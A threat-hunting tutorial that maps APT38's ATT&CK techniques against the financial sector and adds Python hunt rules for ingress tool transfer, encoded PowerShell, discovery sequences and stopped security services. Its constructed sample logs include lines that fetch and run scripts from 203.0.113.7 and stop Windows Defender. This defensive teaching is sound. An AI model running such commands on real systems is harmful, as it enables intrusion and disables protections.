Introduction to Threat Hunting - MITRE ATT&CK® Framework

MITRE ATT&CK® is a knowledge base of cyber adversary behavior and a taxonomy of adversarial actions across the attack lifecycle. IR and hunt teams can use it as a reference for the tactics, techniques and procedures (TTPs) of the APTs currently targeting the industry they are part of.

In this discussion, we will explore how to perform a hunt using MITRE ATT&CK and define a procedure that makes our hunt approach as efficient and effective as possible.

From a hunter’s perspective, having a hunt process is a must. Developing a structured, procedural approach to hunting helps the hunters performing the task stay on track and lets them document the whole process, which can be used later when delivering the report.

Scenario: Hunting APT38 Targeting Financial Sector

In this step, as hunters we must identify which APT groups are currently targeting our industry.

One way to do this is to make effective use of a search engine, for example Google or DuckDuckGo.

The image below is the result of a quick search using the keyword “apt targeting financial sector”.

Now we land on the Mandiant[.]com APT list and use Find (Ctrl + F) to speed up our search for the APT of interest.

Then we land on APT38: North Korea Threat Group that Targets Financial Institutions World-Wide.

#note: The steps in this discussion apply in the same way when you search for a specific APT that targets a different industry.

#note: To speed up the process, look for the “additional resources” tab on the blog posts you visit.

One great thing for hunters when hunting threat groups is that they are not alone: many organizations and threat intelligence teams are in continuous pursuit of information about the latest threats, which they share with the public so that other teams can use it for hunting.

To perform effectively as hunters, we must treat these external sources as an opportunity to expedite our research.

The sample below is from Mandiant’s Threat Research Team and gives full details of how APT38 perform and structure their attack.

As hunters, we can use these details to structure our hunt, correlate on their TTPs and proceed in a methodical way.

Source: https://www.mandiant.com/resources/apt38-details-on-new-north-korean-regime-backed-threat-group

We now know our threat group of interest.

Now we can use MITRE ATT&CK to map their TTPs. This helps us structure their attack life cycle and understand how they perform their actions.

Source: https://mitre-attack.github.io/attack-navigator//#layerURL=https%3A%2F%2Fattack.mitre.org%2Fgroups%2FG0082%2FG0082-enterprise-layer.json

Step 4: Structuring APT38 Attack Life Cycle

In this stage, according to the Mandiant threat research team, APT38 relied on watering holes and exploited an insecure, out-of-date version of Apache Struts2 to execute code on the system.

In most cases, APT38 gain an initial foothold through the following:

      • Strategic Web Compromise
      • Apache Struts2 vulnerabilities

These types of approach exploit vulnerabilities in most web-facing servers.

To mitigate and monitor these exploits we can do the following:

      • Perform vulnerability scanning
      • Document all out-of-date servers for monitoring

To see all the known vulnerabilities in Apache Struts2 you can visit CVE Details:

https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-6117/Apache-Struts.html

Know more about Technique T1190:

https://attack.mitre.org/techniques/T1190/

In this stage, a level 1 initial compromise is established through exploitation of an out-of-date web-facing server. After that, just like a burglar who has successfully breached the house, they contact the other party and await instructions.

According to the Mandiant Research Team, APT38 perform technique T1105 Ingress Tool Transfer to establish a foothold, after exploiting a known vulnerability in out-of-date Linux servers hosting Apache Struts2 that gives RCE (Remote Code Execution). Adversaries may transfer additional tools or other files from an external system into the compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the foothold established by the previous exploitation. Once that foothold is established, attacker tools can be transferred from external sources to victim devices within the compromised environment.

To hunt for artifacts in this stage:

For hunters to hunt artifacts on Windows, look for:

      • copy
      • finger
      • PowerShell IEX, DownloadString(), Invoke-WebRequest

For hunters to hunt artifacts on Linux & Mac, look for:

      • curl
      • scp
      • sftp
      • tftp
      • rsync
      • finger
      • wget

To mitigate these approaches:

Use vulnerability scanning tools to enumerate all affected and out-of-date servers; if mitigation of these servers is not possible, document all of them for monitoring.

Use Network Intrusion Prevention.

Artifacts that can be used for hunting:

Firewall Related Event: Allowed Connection

Network monitoring: In/Out traffic in non-standard port

Anti-Virus logs: Whitelisting software / Alerts

Endpoint Sessions: RDP Session, VNC, Remote tools

#note: Hunters may want to dig into endpoints or servers that contact untrusted domains or external private IP addresses.

Know more about MITRE ATT&CK Technique T1105:

https://attack.mitre.org/techniques/T1105/

 

In this stage, accounts with non-administrator privileges are identified, mostly local and standard domain accounts. APT38 then elevate from a normal user account to an admin account using a set of tools, so they can carry out their intention with admin privileges.

In this stage, APT38 make their move using living-off-the-land techniques and possibly in-memory attacks, such as use of the PowerSploit Mimikatz module.

Threat actors enumerate user credentials in this stage through:

      • Dumping the LSASS cache: Mimikatz credential dumping, T1003
      • Dropped account enumeration tool: SORRYBRUTE, T1110

These are some of the techniques used by APT38 to escalate and dump credentials, elevating themselves from a non-admin to an admin account.

To detect this type of privilege escalation attack, look for:

      • PowerShell with -En, -C, -ExecutionPolicy Bypass
      • PowerShell Invoke-WebRequest
      • PowerShell .DownloadString()

Also, termination of endpoint services and processes such as:

      • Windows Defender
      • EDR
      • Anti-Virus
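As an added example, not code from the original post or from Mandiant, here are the Windows and Linux artifacts listed for the Ingress Tool Transfer stage together with the PowerShell flags and security-tool termination indicators listed above, written as hunt rules in Python and run over a constructed sample of process-creation events. The hosts, accounts, the 203.0.113.7 address and the command lines are made up for the example; flagging copy only from a UNC path and the WinDefend/MsMpEng names are my assumptions.

```python
import re
from typing import Dict, List

# Constructed process-creation events (not real telemetry), one per line:
# timestamp | host | user | image | command line
SAMPLE_EVENTS = r"""
2023-01-10T09:12:03Z|FIN-WEB01|svc_struts|/usr/bin/curl|curl -s http://203.0.113.7/upd.sh -o /tmp/upd.sh
2023-01-10T09:12:05Z|FIN-WEB01|svc_struts|/bin/bash|bash /tmp/upd.sh
2023-01-10T09:30:41Z|HR-WS14|bob|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
2023-01-10T10:02:19Z|FIN-WEB02|root|/usr/bin/rsync|rsync -av /var/backups/ backup01:/srv/backups/
2023-01-10T10:15:00Z|HR-WS14|bob|C:\Windows\System32\cmd.exe|cmd /c copy report.xlsx \\fileserver\hr\
2023-01-10T11:44:52Z|HR-WS14|bob|C:\Windows\System32\cmd.exe|cmd /c copy \\203.0.113.7\share\s.exe C:\Users\Public\s.exe
2023-01-10T11:46:10Z|HR-WS14|bob|C:\Windows\System32\cmd.exe|cmd /c sc stop WinDefend
"""

# Indicator name and regex on the command line. copy is only flagged when the source
# is a UNC path, otherwise every local file copy would match (assumption, not from the post).
INDICATORS = [
    ("curl", re.compile(r"\bcurl\b")),
    ("wget", re.compile(r"\bwget\b")),
    ("scp/sftp/tftp", re.compile(r"\b(scp|sftp|tftp)\b")),
    ("rsync", re.compile(r"\brsync\b")),
    ("finger", re.compile(r"\bfinger\b")),
    ("copy from UNC path", re.compile(r"\bcopy\s+\\\\\S+")),
    ("PowerShell download cradle",
     re.compile(r"\bIEX\b|Invoke-Expression|DownloadString|Invoke-WebRequest|\biwr\b", re.I)),
    ("PowerShell -En/-C/-ExecutionPolicy Bypass",
     re.compile(r"powershell(\.exe)?\b.*\s-(e|en|enc|encodedcommand|c|command)\b|-ex\w*\s+bypass", re.I)),
    # WinDefend / MsMpEng are the Defender service and process; EDR/AV names vary by vendor.
    ("security tool stopped",
     re.compile(r"\b(sc\s+stop|net\s+stop|Stop-Service|taskkill)\b.*\b(WinDefend|MsMpEng|Sense|EDR)\b", re.I)),
]

def parse_events(text: str) -> List[Dict[str, str]]:
    """Split the pipe-delimited constructed log into event dicts."""
    fields = ("ts", "host", "user", "image", "cmdline")
    return [dict(zip(fields, line.split("|", 4)))
            for line in text.splitlines() if line.strip()]

def match_indicators(cmdline: str) -> List[str]:
    return [name for name, rx in INDICATORS if rx.search(cmdline)]

def hunt(text: str) -> List[Dict[str, str]]:
    """One hit per (event, indicator). Legitimate admin jobs such as the rsync backup
    match too, so hits are leads to baseline and triage, not alerts."""
    return [{**ev, "indicator": name}
            for ev in parse_events(text) for name in match_indicators(ev["cmdline"])]

def hosts_to_triage(hits: List[Dict[str, str]]) -> List[str]:
    return sorted({h["host"] for h in hits})

if __name__ == "__main__":
    for h in hunt(SAMPLE_EVENTS):
        print(h["ts"], h["host"], h["user"], "->", h["indicator"])
```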

Learn more about OS Credential Dumping Technique T1003: https://attack.mitre.org/techniques/T1003/

Learn more about Brute Force Technique T1110:

https://attack.mitre.org/techniques/T1110/


APT38 successfully leverage the level 1 stage compromise, moving from a non-admin user account to a local administrator or domain admin account. In this stage APT38 can perform internal recon on the level 1 compromised endpoint to map the environment and look for a possible level 2 compromise jump. The next task performed by APT38, according to Mandiant Threat Research, is to enumerate every possible detail that gives them information about the organization’s network, processes, services, accounts, domain policies, etc.

This step is half of the success for APT38, allowing them to perform their operation on the compromised host with administrator privileges, which gives them the ability to perform super-user tasks.

APT38 map different details of the network such as:
    • Network topology: arp, route print, wmi, net*
    • Network services: mDNS query dns-sd -B _ssh._tcp
    • Users: net.exe, /etc/passwd, /Users
    • System and services: tasklist, sc, net start, systemctl
    • Group Policy: Get-DomainGPO, Get-DomainGPOLocalGroup
    • Firewall rule modifications: event IDs 2004, 2005, 5156, 5146

As hunters, we can monitor these techniques inside our network for anomalies, for example by using the SIEM to monitor administrator commands such as wmi, or the firewall event IDs that trigger when a rule is added.

E.g. Bob is a normal user in the HR department, but Bob’s account was caught logged in, launching powershell.exe with the -En parameter, at a time outside typical office hours. As hunters, this gives us a breadcrumb that something is happening. This is a sample red flag that can be worth digging into.

#note: Hunters should hunt for anomalies like enumeration of processes and services combined with user and network enumeration, followed by firewall modifications. An account with legitimate intentions does not usually run this set of commands in sequence; if any account, usually a local admin or domain admin, executes commands that match this pattern, it might be worth digging into.
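As an added example, not from the original post, the anomaly described in the note above written in Python as a per-account correlation over a constructed event sample: discovery commands from several categories within one time window, a firewall rule change (event ID 2004 or 2005 from the list above), and an encoded PowerShell launch outside office hours. The accounts bob and alice, the timestamps, the command lines and the 08:00-17:59 office hours are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery categories from the list above, as regexes on the command line.
DISCOVERY = {
    "network":  re.compile(r"\barp\b|\broute\s+print\b|\bwmic?\b|\bnet\s+view\b", re.I),
    "users":    re.compile(r"\bnet\s+(user|group|localgroup)\b|\b(whoami|quser)\b", re.I),
    "services": re.compile(r"\btasklist\b|\bsc\s+query\b|\bnet\s+start\b|\bsystemctl\b", re.I),
    "gpo":      re.compile(r"Get-DomainGPO|\bgpresult\b", re.I),
}
FIREWALL_RULE_EVENTS = {2004, 2005}  # Windows Firewall: rule added / rule modified
ENCODED_PS = re.compile(r"powershell(\.exe)?\b.*\s-(en|enc|encodedcommand)\b", re.I)
OFFICE_HOURS = range(8, 18)          # assumption: 08:00-17:59 local time is normal

# Constructed events (not real logs): (timestamp, account, kind, detail); kind is
# "proc" with the command line, or "fw" with the Windows Firewall event ID.
EVENTS = [
    ("2023-01-10T22:03:10", "bob",   "proc", "powershell.exe -NoP -En <encoded payload>"),
    ("2023-01-10T22:04:30", "bob",   "proc", "arp -a"),
    ("2023-01-10T22:04:45", "bob",   "proc", "net user /domain"),
    ("2023-01-10T22:05:02", "bob",   "proc", "tasklist /svc"),
    ("2023-01-10T22:06:40", "bob",   "proc", "powershell -c Get-DomainGPOLocalGroup"),
    ("2023-01-10T22:08:15", "bob",   "fw",   "2004"),
    ("2023-01-10T10:15:00", "alice", "proc", "tasklist /svc"),
    ("2023-01-10T10:16:00", "alice", "proc", "sc query wuauserv"),
    ("2023-01-10T14:20:00", "alice", "proc", "net localgroup administrators"),
]

def classify(kind, detail):
    """Map one event to a discovery category, 'fw_rule_change', or None."""
    if kind == "fw":
        return "fw_rule_change" if int(detail) in FIREWALL_RULE_EVENTS else None
    return next((cat for cat, rx in DISCOVERY.items() if rx.search(detail)), None)

def correlate(events, window_minutes=30):
    per_user = defaultdict(list)
    for ts, user, kind, detail in events:
        per_user[user].append((datetime.fromisoformat(ts), kind, detail))
    findings = {}
    for user, evs in per_user.items():
        evs.sort()
        best = set()  # richest category set seen inside any one sliding window
        for i, (t0, _, _) in enumerate(evs):
            within = [(k, d) for t, k, d in evs[i:] if t - t0 <= timedelta(minutes=window_minutes)]
            seen = {c for c in (classify(k, d) for k, d in within) if c}
            best = seen if len(seen) > len(best) else best
        encoded = any(k == "proc" and ENCODED_PS.search(d) and t.hour not in OFFICE_HOURS for t, k, d in evs)
        cats = sorted(best - {"fw_rule_change"})
        fw = "fw_rule_change" in best
        # Flag: 3+ discovery categories, or discovery plus a firewall change, or the off-hours -En launch
        findings[user] = {"categories": cats, "fw_rule_change": fw, "off_hours_encoded_ps": encoded,
                          "suspicious": len(cats) >= 3 or (bool(cats) and fw) or encoded}
    return findings
```

Alice's two tasklist/sc query events and the net localgroup four hours later never share a window, so she stays at one category; Bob's sequence lands in one window and trips all three signals.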

Learn more about the following Techniques discussed:

T1046 Network Service Discovery:

https://attack.mitre.org/techniques/T1046/

T1040 Network Sniffing:

https://attack.mitre.org/techniques/T1040/

T1007 System Service Discovery:

https://attack.mitre.org/techniques/T1007/

T1087 Account Discovery:

https://attack.mitre.org/techniques/T1087/

T1615 Group Policy Discovery:

https://attack.mitre.org/techniques/T1615/

T1082 System Information Discovery:

https://attack.mitre.org/techniques/T1082/

In this stage, APT38 try to stay on the compromised network as stealthily as possible. The longer the threat actors stay on the system, the harder it is for analysts to detect them; within this stage registry keys, kernel configurations and security tools might be changed, which allows them to move freely without worrying about detection.

In this stage, APT38 deploy additional tools such as malware to stay hidden until their transaction is completed. This can be done by dropping rootkits and staying hidden until their agenda is completed.

In this stage, the threat actors maintain persistence on the system through the dropped rootkit malware.

After the mission, according to the Mandiant Threat Research team, APT38 cover their tracks by performing actions like:

      • Deleting log sources
      • Firmware corruption for anti-forensics
      • Disk wipe to hide their artifacts
      • Data Manipulation
      • Hide artifacts

This leaves the compromised organization with a huge impact on its business and infrastructure.

Learn more about the following techniques discussed:

T1565 Data Manipulation:

https://attack.mitre.org/techniques/T1565/

T1564 Hide Artifacts:

https://attack.mitre.org/techniques/T1564/

T1561 Disk Wipe:

https://attack.mitre.org/techniques/T1561/

T1495 Firmware Corruption:

https://attack.mitre.org/techniques/T1495/

T1537 Transfer Data to Cloud Account:

https://attack.mitre.org/techniques/T1537/

TA0040 Impact:

https://attack.mitre.org/tactics/TA0040/

Step 5: Structuring a Methodological Hunt Process for APT38

In this step, we will use the information gathered during the mapping of our threat group of interest, APT38. We will use APT38’s MITRE ATT&CK TTPs to lay out our focus and decide where to start our hunt process.

In this step, the hunter or hunt team should research the current TTPs that could be used by attackers targeting your industry. This includes the following:

      • Initial compromise T1190
      • Establish Foothold T1105
      • Privilege Escalation T1003, T1110
      • Internal Recon & Discovery
      • Transfer Funds & Mission Complete

As we lay out the APT38 Attack Lifecycle, we use it to define each stage and match the corresponding TTPs.

In this stage, the hunter or hunt team must also check whether there are documented known vulnerabilities in unpatched software that the organization has not yet remediated for specific reasons.

#tip: APTs mostly use the same TTPs of attack. A structured hunt process is not limited to a few APTs; it can be applied to any known APT TTPs mapped by MITRE ATT&CK, and not only in the financial sector but also in other industries (e.g. the use of in-memory injection like PowerShell with the .DownloadString() method).

#note: Effective threat hunting must follow a methodical approach rather than searching for various types of threats at once; the starting point is to define a specific, narrowly focused threat that could be underway in the environment.

In this step, hunters assume the possibility that they are already breached and that the attackers already have a level 1 initial foothold. The hunter assesses the goals of APT38 based on the APT38 Attack Life Cycle, then formulates “guesses or questions” about what tactics, techniques and procedures the attackers might use and what evidence they might create that can reveal their activities.

Formulating a hypothesis for APT38 is like making an informed guess and asking questions like:

    • If APT38 successfully gained an initial foothold, then they must have found a way in, whether through exploiting a public-facing application or through phishing.
    • If APT38 are already performing lateral movement, they might use living-off-the-land techniques.
    • If APT38 are already inside, they might cover their tracks by clearing the system event logs or performing data manipulation.
    • If adversaries are already inside, they will persist on the system through rootkits, Scheduled Tasks or the Registry.

Those are sample guesses and questions from hunters who already assume they are breached. From formulating a hypothesis, hunters can start their investigation and move to step 3, which is to identify and gather evidence.

In this step, hunt teams must identify and assemble the data sources they can analyze within their hunt, as they seek evidence to prove or disprove their formulated hypothesis.

In this step, hunters must document their steps, including the data sources their data comes from, to ensure the hunt can be justified during reporting.

In performing the actual hunt, the information gathered during the mapping of APT38’s Attack Life Cycle can be put to good use together with the MITRE ATT&CK framework. This helps hunters know what and where to look when diving into the huge volume of data from their sources.

In this step, hunters or a hunt team must identify and gather their evidence of the APT38 Attack Life Cycle through data sources such as:

      • Event log management or SIEM
      • Endpoint/Server Baseline copies
      • Network/NIDS logs
      • Firewall and IPS/IDS logs

Performing a hunt with a ton of data sources can be overwhelming; it can drown the hunt team and make the hunt ineffective. To address this lurking problem, the hunt team must keep in mind that there are legitimate activities in the system performed by administrators; what they need to look for are anomalies in that usage, such as unidentified account names, unusual time zones, enumeration, etc., and correlate them with other evidence sources. Effective threat hunting can also rely on endpoint, system and network baselines, which can effectively detect changes in the system or the network.

#note: Not all data sources are listed. As hunters, we must know what data sources our organization has available; that is why threat hunting using human analogy, reasoning and a logical approach, together with the right technology to gather those data sources, makes for effective hunting. Humans alone cannot perform hunting without technology, because humans cannot outperform technology in data parsing and memory; they all have to work together. To sum it up: with no humans, an organization cannot perform threat hunting; with no technology, an organization cannot perform threat hunting.

Evidence is gathered in the previous step.

In this step, the gathered evidence and data are correlated with the help of human analysis and visualization techniques. This is why threat hunting is done effectively by humans with the help of technology: the combination of both can uncover relationships between pieces of evidence across the data sources.

In this step, hunters must make comparisons against past baselines or have a quick chat with other IT teams to answer specific questions and concerns. Effective threat hunting must “not live by bread alone”, meaning hunters cannot rely only on their own understanding; they need other people, like IT leaders from different departments, to help them correlate what they have found and determine whether it is normal or malicious. Hunters at this stage must have a good understanding of what data patterns are associated with an adversary’s activity for the given stage in the attack chain, and this can also be done by correlating evidence with the MITRE ATT&CK framework.

Documentation.

In this step, hunters must present the types of evidence they collected, the tactics, techniques and procedures by which the analysis was performed during the hunt, and the conclusions proved during the process.

This can be the following:

      • Uncovered Vulnerabilities
      • Detected phishing incident
      • Data Exfiltration
      • Data stolen
      • Account usage anomalies
      • Living Off The Land tools detected
      • Metrics of the hunt process
      • Root cause of compromise detected
      • Scope of affected machines, accounts and applications
      • Description of the technique revealed
      • IOC to be used to detect similar attacks
      • Lesson learned and Remediation
      • Recommendation
 
During this stage, reporting the evidence to management opens a discussion that can lead to incident response, patching newly uncovered vulnerabilities and closing the holes in your environment found during the hunt. This also leads to organizational improvements such as covering blind spots and monitoring the specific targets, which helps against future attacks and improves the whole organization’s infrastructure.